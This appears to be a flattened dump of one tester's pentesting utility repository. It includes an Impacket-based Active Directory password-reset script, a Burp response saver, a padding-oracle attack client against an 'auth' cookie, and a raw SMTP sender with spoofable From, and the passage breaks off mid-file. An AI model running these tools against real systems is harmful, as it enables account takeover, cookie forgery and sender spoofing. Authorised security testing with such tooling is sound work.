├── .gitignore ├── LICENSE ├── README.md ├── activedirectory └── smbresetpasswd.py ├── burp_extensions └── saver.py ├── clients ├── requests_padbuster.py ├── smtp_sender.py └── tcp_sender.py ├── commands └── all_strings.sh ├── containerd ├── README.md ├── basecontainerspec.json ├── echoer.py ├── http2_socket_client.py ├── protobuf_parser.py └── socket_grpc_mitm_server.py ├── example_code ├── crypto_helpers.py ├── ddlmb.c ├── django_audit_snippets.py ├── dll.c ├── dll_with_proxies.c ├── getControllers.cs └── python_jwt_code.py ├── exploits └── phpinfo_lfi.py ├── helper_servers ├── dns.py ├── flask_upload.py ├── ftp-xxe.py ├── ftp-xxe3.py ├── http_capture_server.py ├── http_forwarder.py ├── http_put_server.py ├── smtp_receiver.py ├── sqlmap_secondorder_helper_server.py ├── xxe_http.py └── xxe_http_ftpfwd.py ├── payload_creators └── badpickle.py ├── presentations ├── AD_enumeration_with_LDAP_bsides-bonus_detection.pdf └── ActiveDirectoryLDAPEnumeration_public.pdf ├── setup_scripts └── c2_setup.sh └── utilities ├── appportscan.py ├── basic_kerberos_auth.py ├── cert_checker.py ├── clone_cert.py ├── create_eks_auth_token.py ├── create_kubeconfig.sh ├── git_analysis.py ├── jenkins-decrypt.py ├── kubernetes_api_enumerator.py ├── ssh_bruteforcer.py ├── ssh_cert_utilities.py └── sso-helpers.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | 49 | # Translations 50 | *.mo 51 | *.pot 52 | 53 | # Django stuff: 54 | *.log 55 | local_settings.py 56 | 57 | # Flask stuff: 58 | instance/ 59 | .webassets-cache 60 | 61 | # Scrapy stuff: 62 | .scrapy 63 | 64 | # Sphinx documentation 65 | docs/_build/ 66 | 67 | # PyBuilder 68 | target/ 69 | 70 | # Jupyter Notebook 71 | .ipynb_checkpoints 72 | 73 | # pyenv 74 | .python-version 75 | 76 | # celery beat schedule file 77 | celerybeat-schedule 78 | 79 | # SageMath parsed files 80 | *.sage.py 81 | 82 | # dotenv 83 | .env 84 | 85 | # virtualenv 86 | .venv 87 | venv/ 88 | ENV/ 89 | 90 | # Spyder project settings 91 | .spyderproject 92 | .spyproject 93 | 94 | # Rope project settings 95 | .ropeproject 96 | 97 | # mkdocs documentation 98 | /site 99 | 100 | # mypy 101 | .mypy_cache/ 102 | 103 | .DS_Store 104 | activedirectory/*.json 105 | *.dll 106 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2017, Stephen Bradshaw 4 | All rights reserved. 
5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Stephen's Random Pentesting Stuff 2 | 3 | A place to store my various pentesting related code that's too small/niche to justify its own repository, and a simple website with notes on pentesting. 4 | -------------------------------------------------------------------------------- /activedirectory/smbresetpasswd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Impacket - Collection of Python classes for working with network protocols. 3 | # 4 | # SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved. 5 | # 6 | # This software is provided under a slightly modified version 7 | # of the Apache Software License. See the accompanying LICENSE file 8 | # for more information. 9 | # 10 | # Description: 11 | # This script allows the password for a user to be reset remotely over 12 | # SMB (MSRPC-SAMR) by another account with appropriate privileges. 13 | # It supports resetting the password value to an NTLM hash as well as 14 | # a plaintext password. If the password is changed via specifying the 15 | # NTLM hash, Kerberos keys for the target user will no longer be stored 16 | # in the account. 17 | # 18 | # Examples: 19 | # smbresetpasswd.py contoso.local/administrator@DC1 -resetuser j.doe -newpass 'Passw0rd1!' 20 | # smbresetpasswd.py contoso.local/administrator@DC1 -hashes :2788f309aad0b3f06fdec31587b24ea6 -resetuser j.doe -newpass 'Passw0rd1!'
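# A hypothetical Kerberos variant (not one of the original examples; it simply combines the -k, -no-pass and -dc-ip options defined in the argument parser below, and assumes a valid ticket in KRB5CCNAME):
# smbresetpasswd.py -k -no-pass contoso.local/administrator@DC1 -resetuser j.doe -newpass 'Passw0rd1!' -dc-ip 192.168.1.1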
21 | # smbresetpasswd.py contoso.local/administrator:'AdminPass'@DC1 -resetuser j.doe -newhashes :b2bdbe60565b677dfb133866722317fd -dc-ip 192.168.1.1 22 | # 23 | # Author: 24 | # @stephenbradshaw 25 | # 26 | # References: 27 | # https://malicious.link/post/2017/reset-ad-user-password-with-linux/ 28 | # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/50d17755-c6b8-40bd-8cac-bd6cfa31adf2 29 | # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/1d2be36a-754e-46b1-8697-d8aaa62bc450 30 | # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/23f9ef4c-cf3e-4330-9287-ea4799b03201 31 | # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/99ee9f39-43e8-4bba-ac3a-82e0c0e0699e 32 | # https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/cc325729(v=vs.85) 33 | # https://github.com/samba-team/samba/blob/e742661bd2507d39dfa47e40531dc1dca636cbbe/python/samba/tests/dcerpc/samr_change_password.py 34 | # 35 | 36 | from impacket import version 37 | from impacket.examples import logger 38 | from impacket.examples.utils import parse_target 39 | from impacket.dcerpc.v5 import transport, samr 40 | from impacket.crypto import SamEncryptNTLMHash 41 | from Cryptodome.Cipher import ARC4 42 | from Cryptodome.Random import get_random_bytes 43 | from binascii import unhexlify 44 | import argparse 45 | import sys 46 | import logging 47 | 48 | 49 | class SamrResetPassword(): 50 | 51 | def __init__(self, username='', password='', domain='', hashes=None, aesKey=None, doKerberos=False, port=445, dc_ip=None): 52 | self.__username = username 53 | self.__password = password 54 | self.__domain = domain 55 | self.__lmhash = '' 56 | self.__nthash = '' 57 | self.__aesKey = aesKey 58 | self.__doKerberos = doKerberos 59 | self.__kdcHost = dc_ip 60 | self.__port = port 61 | if hashes is not None: 62 | self.__lmhash, self.__nthash = hashes.split(':') 63 | 64 | if self.__kdcHost is not None: 65 | domainController = self.__kdcHost 66 | elif self.__domain != '': 67 | domainController = self.__domain 68 | else: 69 | print('\nAn exception occurred during an attempt to connect to a domain controller:\n\nA domain value is required!') 70 | sys.exit(1) 71 | 72 | logging.info('Creating authenticated SMB connection to domain controller {}'.format(domainController)) 73 | try: 74 | self.rpctransport = transport.SMBTransport(domainController, self.__port, r'\samr', self.__username, self.__password, 75 | self.__domain, self.__lmhash, self.__nthash, self.__aesKey, 76 | doKerberos=self.__doKerberos, kdcHost = self.__kdcHost) 77 | 78 | self.dce = self.rpctransport.get_dce_rpc() 79 | self.dce.connect() 80 | logging.info('Authentication to domain controller {} succeeded!'.format(domainController)) 81 | self.dce.bind(samr.MSRPC_UUID_SAMR) 82 | self.sessionKey = self.dce.get_rpc_transport().get_smb_connection().getSessionKey() 83 | except Exception as e: 84 | print('\nAn exception occurred during an attempt to create an authenticated SAMR connection:\n\n{}'.format(e)) 85 | sys.exit(1) 86 | 87 | 88 | def sampr_encrypt_user_password(self, password): 89 | encoded_password = password.encode('utf-16-le') 90 | encoded_length = len(encoded_password) 91 | 92 | buffer = get_random_bytes(512-encoded_length) 93 | buffer += encoded_password 94 | buffer += encoded_length.to_bytes(4, byteorder='little') 95 | 96 | cipher = ARC4.new(self.sessionKey) 97 | 98 | pwd = samr.SAMPR_ENCRYPTED_USER_PASSWORD() 99 | pwd['Buffer'] = cipher.encrypt(buffer) 100 | return pwd 101 | 102 | 103 |
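# Note on sampr_encrypt_user_password() above: per MS-SAMR, the SAMPR_ENCRYPTED_USER_PASSWORD plaintext is a 512 byte buffer (random padding followed by the UTF-16-LE password) plus a 4 byte little-endian length field, and the whole 516 byte blob is RC4 encrypted with the SMB session key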
def reset_password(self, user, newpassword=None, newhashes=None): 104 | if not (newpassword or newhashes): 105 | print('\nAn exception occurred during an attempt to reset the password:\n\nA new password value is required') 106 | sys.exit(1) 107 | 108 | resp = samr.hSamrConnect(self.dce) 109 | serverHandle = resp['ServerHandle'] 110 | resp = samr.hSamrEnumerateDomainsInSamServer(self.dce, serverHandle) 111 | domains = resp['Buffer']['Buffer'] 112 | domainName = domains[0]['Name'] 113 | logging.info('Identified domain {} from domain controller.'.format(domainName)) 114 | 115 | resp = samr.hSamrLookupDomainInSamServer(self.dce, serverHandle, domainName) 116 | domainSid = resp['DomainId'].formatCanonical() 117 | logging.info('SID of domain {} is {}'.format(domainName, domainSid)) 118 | 119 | resp = samr.hSamrOpenDomain(self.dce, serverHandle = serverHandle, domainId = resp['DomainId']) 120 | domainHandle = resp['DomainHandle'] 121 | 122 | if user.lower().startswith(domainSid.lower()): 123 | userRid = int(user.split('-')[-1]) 124 | logging.info('Identified user RID {} from user SID {}'.format(userRid, user)) 125 | else: 126 | resp = samr.hSamrLookupNamesInDomain(self.dce, domainHandle, [user]) 127 | userRid = resp['RelativeIds']['Element'][0]['Data'] 128 | logging.info('Identified user RID {} by name lookup for {}'.format(userRid, user)) 129 | 130 | logging.info('Requesting USER_FORCE_PASSWORD_CHANGE handle for user RID {}'.format(userRid)) 131 | request = samr.SamrOpenUser() 132 | request['DomainHandle'] = domainHandle 133 | request['DesiredAccess'] = samr.USER_FORCE_PASSWORD_CHANGE 134 | request['UserId'] = userRid 135 | 136 | try: 137 | resp = self.dce.request(request) 138 | logging.info('Obtained handle for user RID {}'.format(userRid)) 139 | except Exception as e: 140 | print('\nAn exception occurred during an attempt to create a handle for user {}:\n\n{}'.format(user, e)) 141 | sys.exit(1) 142 | 143 | request = samr.SamrSetInformationUser2() 144 | request['UserHandle'] = resp['UserHandle'] 145 | 146 | buffer = samr.SAMPR_USER_INFO_BUFFER() 147 | 148 | if newhashes: 149 | logging.info('Performing password reset by specifying new hashes (Kerberos key credentials will no longer be available)') 150 | lm, nt = newhashes.split(':') 151 | unhashable = False 152 | try: 153 | nthash = unhexlify(nt) 154 | lmhash = unhexlify(lm) 155 | except: 156 | unhashable = True 157 | if (len(nt) != 32) or unhashable or not (len(lm) == 0 or len(lm) == 32): 158 | print('\nAn error occurred when setting new password!\n\nNew password hashes were provided in incorrect format!') 159 | sys.exit(1) 160 | request['UserInformationClass'] = samr.USER_INFORMATION_CLASS.UserInternal1Information 161 | buffer['tag'] = samr.USER_INFORMATION_CLASS.UserInternal1Information 162 | buffer['Internal1']['EncryptedNtOwfPassword'] = SamEncryptNTLMHash(nthash, self.sessionKey) 163 | buffer['Internal1']['EncryptedLmOwfPassword'] = SamEncryptNTLMHash(lmhash, self.sessionKey) if lm else bytes([0]) * 16 164 | buffer['Internal1']['NtPasswordPresent'] = 1 165 | buffer['Internal1']['LmPasswordPresent'] = 1 if lm else 0 166 | buffer['Internal1']['PasswordExpired'] = 0 167 | else: 168 | logging.info('Performing password reset by specifying new password') 169 | request['UserInformationClass'] = samr.USER_INFORMATION_CLASS.UserInternal5Information 170 | buffer['tag'] = samr.USER_INFORMATION_CLASS.UserInternal5Information 171 | buffer['Internal5']['UserPassword'] = self.sampr_encrypt_user_password(newpassword) 172 | 
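# a PasswordExpired value of 0 means the target user is not forced to change the newly set password at next logon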
buffer['Internal5']['PasswordExpired'] = 0 173 | 174 | request['Buffer'] = buffer 175 | try: 176 | resp = self.dce.request(request) 177 | except Exception as e: 178 | print('\nAn unexpected error occurred when attempting to reset the password:\n\n{}'.format(e)) 179 | sys.exit(1) 180 | logging.info('Password reset request performed, response code is {}'.format(resp['ErrorCode'])) 181 | return resp['ErrorCode'] 182 | 183 | 184 | if __name__ == '__main__': 185 | print(version.BANNER) 186 | 187 | parser = argparse.ArgumentParser() 188 | 189 | parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>') 190 | parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output') 191 | parser.add_argument('-port', type=int, default=445, action='store', help='Port to use for connection. Default is 445') 192 | parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') 193 | 194 | resetparametersgroup = parser.add_argument_group('reset target') 195 | 196 | resetparametersgroup.add_argument('-resetuser', action='store', required=True, help='Name or SID of user to reset password for') 197 | 198 | xgroup = resetparametersgroup.add_mutually_exclusive_group() 199 | xgroup.add_argument('-newpass', action='store', default=None, help='new SMB password') 200 | xgroup.add_argument('-newhashes', action='store', default=None, metavar = 'LMHASH:NTHASH', help='new NTLM hashes, format is LMHASH:NTHASH') 201 | 202 | group = parser.add_argument_group('authentication') 203 | 204 | group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') 205 | group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)') 206 | group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file ' 207 | '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ' 208 | 'ones specified in the command line') 209 | group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication ' 210 | '(128 or 256 bits)') 211 | group.add_argument('-dc-ip', action='store',metavar = "ip address", default=None, help='IP Address of the domain controller. 
If ' 212 | 'omitted it will use the domain part (FQDN) specified in the target parameter') 213 | 214 | if len(sys.argv)==1: 215 | parser.print_help() 216 | sys.exit(1) 217 | 218 | options = parser.parse_args() 219 | 220 | logger.init(options.ts) 221 | 222 | if options.debug is True: 223 | logging.getLogger().setLevel(logging.DEBUG) 224 | logging.debug(version.getInstallationPath()) 225 | else: 226 | logging.getLogger().setLevel(logging.INFO) 227 | 228 | domain, username, password, address = parse_target(options.target) 229 | 230 | 231 | if domain is None: 232 | domain = '' 233 | 234 | if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None: 235 | from getpass import getpass 236 | password = getpass("Password:") 237 | 238 | if options.aesKey is not None: 239 | options.k = True 240 | 241 | 242 | reseter = SamrResetPassword(username=username, domain=domain, hashes=options.hashes, aesKey=options.aesKey, doKerberos=options.k, port=options.port, dc_ip=options.dc_ip) 243 | result = reseter.reset_password(options.resetuser, newpassword=options.newpass, newhashes=options.newhashes) 244 | 245 | if result == 0: 246 | print('Password for user {} reset successfully!'.format(options.resetuser)) 247 | else: 248 | print('Error code {} received when attempting to reset password for user {}!'.format(result, options.resetuser)) 249 | -------------------------------------------------------------------------------- /burp_extensions/saver.py: -------------------------------------------------------------------------------- 1 | # burp extension to save page response content from the site map via a right click 2 | 3 | #burp imports 4 | from burp import IBurpExtender 5 | from burp import IContextMenuFactory 6 | 7 | #Java imports 8 | from javax.swing import JMenuItem 9 | from java.util import List,ArrayList 10 | from java.net import URL 11 | 12 | #python imports 13 | import threading 14 | import os 15 | import sys 16 | from binascii import hexlify 17 | 18 | # basedir in which to save responses 19 | baseDir = '/tmp/' 20 | siteMapRetrieve = False # try and get response data from the site map if it's not in the selected message 21 | 22 | 23 | class BurpExtender(IBurpExtender,IContextMenuFactory): 24 | def registerExtenderCallbacks(self,callbacks): 25 | self.callbacks = callbacks 26 | self.helpers = callbacks.getHelpers() 27 | self.callbacks.setExtensionName("Item response saver") 28 | self.callbacks.registerContextMenuFactory(self) 29 | self._createIfNotExist(baseDir) 30 | self.stdout = callbacks.getStdout() 31 | self.stderr = callbacks.getStderr() 32 | return 33 | 34 | def createMenuItems(self, IContextMenuInvocation): 35 | self.selectedMessages = IContextMenuInvocation.getSelectedMessages() 36 | menuItemList = ArrayList() 37 | menuItemList.add(JMenuItem("Save responses", actionPerformed = self.onClick)) 38 | return menuItemList 39 | 40 | def _createIfNotExist(self, dir): 41 | if not os.path.isdir(dir): 42 | os.mkdir(dir) 43 | 44 | 45 | def download(self, messages): 46 | print 'About to save {} requests to disk...'.format(len(messages)) 47 | filenames = {} 48 | try: 49 | for message in messages: 50 | srv_a = self.helpers.analyzeRequest(message) 51 | this_url = srv_a.getUrl().toString().split(":")[0] + ":" + srv_a.getUrl().toString().split(":")[1] + "/" + srv_a.getUrl().toString().split(":")[2].split("/",1)[1] 52 | responseInMessage = False 53 | if 'getResponse' in dir(message): 54 | rd = message.getResponse() 55 | if rd: 56 | ar = self.helpers.analyzeResponse(rd) 57 | 
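# getBodyOffset() gives the index where the response headers end, so the slice below keeps only the body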
bo = ar.getBodyOffset() 58 | response = self.helpers.bytesToString(rd)[bo:] 59 | 60 | if len(response) > 2: 61 | responseInMessage = True 62 | else: 63 | print 'Response content for {} could not be retrieved from selected message'.format(this_url) 64 | 65 | 66 | if siteMapRetrieve and not responseInMessage: # response not in message, try and retrieve from site map 67 | sm = self.callbacks.getSiteMap(this_url) 68 | for sme in sm: 69 | srv_b = self.helpers.analyzeRequest(sme) 70 | entry_url = srv_b.getUrl().toString().split(":")[0] + ":" + srv_b.getUrl().toString().split(":")[1] + "/" + srv_b.getUrl().toString().split(":")[2].split("/",1)[1] 71 | if this_url == entry_url: 72 | 73 | rd = sme.getResponse() 74 | if rd: 75 | ar = self.helpers.analyzeResponse(rd) 76 | bo = ar.getBodyOffset() 77 | response = self.helpers.bytesToString(rd)[bo:] 78 | 79 | if len(response) > 2: 80 | break 81 | 82 | bits = [a for a in ("/" + srv_a.getUrl().toString().split(":")[2].split("/",1)[1].split('?')[0]).split('/') if a] 83 | fn = baseDir + '/'.join(bits) 84 | od = baseDir 85 | for di in bits[:-1]: 86 | od = os.path.join(od, di) 87 | self._createIfNotExist(od) 88 | if fn in filenames: 89 | filenames[fn] += 1 90 | fn = '{}_{}'.format(fn, str(filenames[fn]-1)) 91 | else: 92 | filenames[fn] = 0 93 | open(fn, 'wb').write(response.encode('utf8')) 94 | except Exception as e: 95 | self.stderr.write('An error occurred: {}'.format(e)) 96 | 97 | 98 | print 'Saved {} requests to disk!'.format(len(messages)) 99 | 100 | 101 | def onClick(self, event): 102 | requests = self.selectedMessages 103 | 104 | t = threading.Thread(target=self.download,args=[requests]) 105 | t.daemon = True 106 | t.start() 107 | 108 | 109 | -------------------------------------------------------------------------------- /clients/requests_padbuster.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from paddingoracle import BadPaddingException, PaddingOracle 3 | 4 | class RequestPadbuster(PaddingOracle): 5 | '''Instance of PaddingOracle that sets some default parameters using the requests module''' 6 | 7 | import socket 8 | import time 9 | import requests 10 | 11 | def __init__(self, **kwargs): 12 | '''Constructor with sensible requests defaults''' 13 | 14 | super(RequestPadbuster, self).__init__(**kwargs) 15 | self.session = self.requests.Session() 16 | self.wait = kwargs.get('wait', 2.0) 17 | self.session.verify = kwargs.get('verify', False) 18 | self.session.timeout = kwargs.get('timeout', 5) 19 | self.session.stream = kwargs.get('stream', False) 20 | self.session.proxies = kwargs.get('proxies', {}) 21 | self.session.headers = kwargs.get('headers', {}) 22 | self.session.allow_redirects = kwargs.get('allow_redirects', True) 23 | self.session.cookies = self.requests.utils.cookiejar_from_dict(kwargs.get('cookies', {})) 24 | self.url = kwargs.get('url', None) 25 | if not self.url: 26 | raise ValueError('No value for url provided') 27 | 28 | 29 | def doRequest(self, payload): 30 | '''Perform the padding request incorporating payload using the requests session object in self.session, return the response''' 31 | raise NotImplementedError 32 | 33 | 34 | def encode(self, input): 35 | '''Performs encoding of raw payload data to something acceptable by application, return the encoded value''' 36 | raise NotImplementedError 37 | 38 | 39 | def checkResponse(self, response): 40 | '''Check the response from the app, return True for a value indicating a padding error, False for correct padding''' 41 | 
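# abstract hook: concrete subclasses (such as PadBuster below) must implement this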
raise NotImplementedError 42 | 43 | 44 | 45 | def oracle(self, data, **kwargs): 46 | '''Implementation of oracle function''' 47 | payload = self.encode(data) 48 | import logging # imported locally: the module level import only happens in the __main__ block below, so the retry path would otherwise raise a NameError when this class is imported 49 | while 1: 50 | try: 51 | response = self.doRequest(payload) 52 | break 53 | except (self.socket.error, self.requests.exceptions.RequestException): 54 | logging.exception('Retrying request in %.2f seconds...', self.wait) 55 | self.time.sleep(self.wait) 56 | continue 57 | 58 | self.history.append(response) 59 | 60 | if self.checkResponse(response): 61 | raise BadPaddingException 62 | 63 | 64 | 65 | 66 | class PadBuster(RequestPadbuster): 67 | '''Example subclass implementation of RequestPadbuster class''' 68 | import urllib 69 | import base64 70 | 71 | def doRequest(self, payload): 72 | '''Perform the padding request incorporating payload using the requests session object in self.session, return the response''' 73 | self.session.cookies['auth'] = payload 74 | return self.session.get(self.url) 75 | 76 | def encode(self, input): 77 | '''Performs encoding of raw payload data to something acceptable by application, return the encoded value''' 78 | return self.urllib.quote(self.base64.b64encode(input)) 79 | 80 | def checkResponse(self, response): 81 | '''Check the response from the app, return True for a value indicating a padding error, False for correct padding''' 82 | return 'Invalid padding' in response.text 83 | 84 | 85 | 86 | 87 | if __name__ == '__main__': 88 | import logging 89 | from base64 import b64decode 90 | from urllib import unquote 91 | 92 | logging.basicConfig(level=logging.DEBUG) 93 | 94 | encrypt_string = 'user=admin' 95 | cookie = 'A41WLaMt2MZ87HXpVnX1l78u%2BjO0vjiU' 96 | raw_data = b64decode(unquote(cookie)) 97 | 98 | padbuster = PadBuster(url='http://192.168.33.101/index.php') 99 | 100 | #decrypted = padbuster.decrypt(raw_data, block_size=8, iv=None) 101 | #print 'Decrypted cookie: %s => %r' % (cookie, decrypted) 102 | 103 | #encrypted = padbuster.encrypt(encrypt_string, block_size=8, iv=None) 104 | #print 'New encrypted cookie for value %s => %s' %(encrypt_string, padbuster.encode(encrypted)) 105 | -------------------------------------------------------------------------------- /clients/smtp_sender.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | '''SMTP sender''' 3 | from __future__ import print_function 4 | from builtins import bytes 5 | from optparse import OptionParser 6 | from email.mime.base import MIMEBase 7 | from email.mime.multipart import MIMEMultipart 8 | from email.mime.text import MIMEText 9 | from email import utils 10 | import smtplib 11 | import os 12 | import sys 13 | import mimetypes 14 | import socket 15 | import select 16 | import random 17 | 18 | 19 | 20 | # shut up about constants pylint!
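# Example invocation (hypothetical host and addresses; the flags are those defined in the OptionParser setup below):
# ./smtp_sender.py -z 127.0.0.1 -p 25 -f sender@example.com -r rcpt@example.com -s 'Test mail' -b 'Hello there'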
21 | # pylint: disable-msg=C0103 22 | 23 | def rnumeric(length): 24 | '''Generate a numeric string of given length''' 25 | return ''.join([str(random.randint(0, 9)) for a in range(0, length)]) 26 | 27 | 28 | def msg_id(): 29 | '''Generate a message id''' 30 | return '.'.join([rnumeric(a) for a in [12, 4, 20]]) + '@' + socket.gethostname() 31 | 32 | 33 | def detect_filetype(fn, bodyFile=False): 34 | '''Detect mime type information about a file''' 35 | ct, enc = mimetypes.guess_type(fn) 36 | if ct is None and bodyFile: 37 | fdata = open(fn, 'rb').read() 38 | ct = 'text/html' if '<html>' in fdata else 'text/plain' 39 | else: 40 | if ct is None or enc is not None: 41 | ct = 'application/octet-stream' 42 | return ct.split('/', 1) # [maintype, subtype] 43 | 44 | 45 | def sendraw(address, sendr, recip, subj, afrom=None, nheaders=None, bheaders=None, textbody=None, data=None, debug=False): 46 | '''Send a raw email using a socket''' 47 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 48 | s.connect(address) 49 | s.setblocking(0) 50 | 51 | send_heads = [ 52 | 'mail FROM:<%s>\n' %(sendr), 53 | 'rcpt TO:<%s>\n' %(recip), 54 | 'data\n' 55 | ] 56 | 57 | if not afrom: 58 | afrom = sendr 59 | 60 | if nheaders: 61 | end = send_heads.pop() 62 | send_heads += [a + '\n' for a in nheaders] 63 | send_heads += [end] 64 | 65 | # if the data value is provided, it will need to be completely specified 66 | # otherwise it is built here from a template 67 | if not data: 68 | if not textbody: 69 | raise Exception('Need to provide textbody') 70 | if bheaders: 71 | dat2 = '\n'.join(bheaders) + '\n' 72 | else: 73 | dat2 = '' 74 | 75 | boundary = rnumeric(19) 76 | dat1 = ('Content-Type: multipart/mixed; boundary="===============%s=="\n' 77 | 'MIME-Version: 1.0\n' 78 | 'Message-ID: <%s>\n') %(boundary, msg_id()) 79 | 80 | dat3 = ('Subject: %s\n' 81 | 'from: %s\n' 82 | 'To: %s\n' 83 | '\n' 84 | '%s\n' 85 | '--===============%s==\n' 86 | '\n' 87 | '--===============%s==--\n' 88 | ) %(subj, afrom, recip, textbody, boundary, boundary) 89 | data = dat1 + dat2 + dat3 90 | 91 | check_receive = True 92 | sent_main = False 93 | 94 | while check_receive: 95 | ready = select.select([s], [], [], 5) 96 | if ready[0]: 97 | received = s.recv(4096) 98 | 99 | if debug: 100 | print('R: {}'.format(received)) 101 | 102 | if received.startswith(b'220'): 103 | val = b'ehlo [127.0.0.1]\n' 104 | s.send(val) 105 | if debug: 106 | print('S: {}'.format(val)) 107 | elif received.startswith(b'250 OK') or b'250 HELP' in received or received.startswith(b'500'): 108 | if send_heads: 109 | val = bytes(send_heads.pop(0), 'ascii') 110 | s.send(val) 111 | if debug: 112 | print('S: {}'.format(val)) 113 | elif sent_main: 114 | val = b'quit\n' 115 | s.send(val) 116 | if debug: 117 | print('S: {}'.format(val)) 118 | check_receive = False 119 | ready = select.select([s], [], [], 5) 120 | if ready[0]: 121 | received = s.recv(4096) 122 | if debug: 123 | print('R: {}'.format(received)) 124 | 125 | elif received.startswith(b'354'): 126 | val = bytes(data + '\r\n.\r\n', 'ascii') 127 | s.send(val) 128 | if debug: 129 | print('S: {}'.format(val)) 130 | sent_main = True 131 | elif received.startswith(b'250'): 132 | if debug: 133 | print('R: {}'.format(received)) 134 | else: 135 | raise Exception('Unexpected response from server: {}'.format(received)) 136 | 137 | s.close() 138 | 139 | 140 | if __name__ == '__main__': 141 | parser = OptionParser(usage='%prog [options]') 142 | parser.add_option('-d', '--debug', dest='debug', 143 | action='store_true', help='show debugging messages') 144 | parser.add_option('-s', '--subject', 
dest='subject', help='email subject [required]') 145 | parser.add_option('-f', '--from', dest='sender', help='email from address [required]') 146 | parser.add_option('-b', '--body', dest='body', help='email body') 147 | parser.add_option('-t', '--bodyfile', dest='bodyfile', help='email body from file') 148 | parser.add_option('-z', '--host', dest='host', help='SMTP host [required]') 149 | parser.add_option('-p', '--port', dest='port', type='int', help='SMTP port [required]') 150 | #parser.add_option('-e', '--base64', dest='b64', action='store_true', 151 | # help='Base64 encoding (default)') 152 | parser.add_option('-g', '--afrom', dest='asender', help='alternate from address to use in the email body') 153 | parser.add_option('-o', '--bodyencode', dest='bodyencode', 154 | action='store_true', help='Use selected encoder to encode body content') 155 | parser.add_option('-r', '--recipients', 156 | dest='recipients', 157 | help='comma separated list of email recipients [required]') 158 | parser.add_option('-a', '--attachments', 159 | dest='attachments', 160 | help='comma separated list of email attachments') 161 | parser.add_option('-j', '--smtpheaders', 162 | dest='smtpheaders', 163 | help='comma separated list of smtp headers') 164 | parser.add_option('-k', '--bodyheaders', 165 | dest='bodyheaders', 166 | help='comma separated list of body headers') 167 | parser.add_option('-i', '--binary', dest='binary', 168 | help='Don\'t detect attachment filetype, send binary') 169 | parser.add_option('-w', '--raw', dest='raw', action='store_true', 170 | help='Send the SMTP message using a raw socket to allow greater manipulation') 171 | opts, args = parser.parse_args() 172 | 173 | if not opts.sender or not opts.subject: 174 | print('Required options missing - you must specify values for -f/--from and -s/--subject') 175 | sys.exit(1) 176 | 177 | try: 178 | recipients = opts.recipients.replace(' ', '').split(',') 179 | subject = opts.subject 180 | sender = opts.sender 181 | to = ', '.join(recipients) 182 | 183 | host = opts.host 184 | port = int(opts.port) 185 | 186 | except (ValueError, NameError, 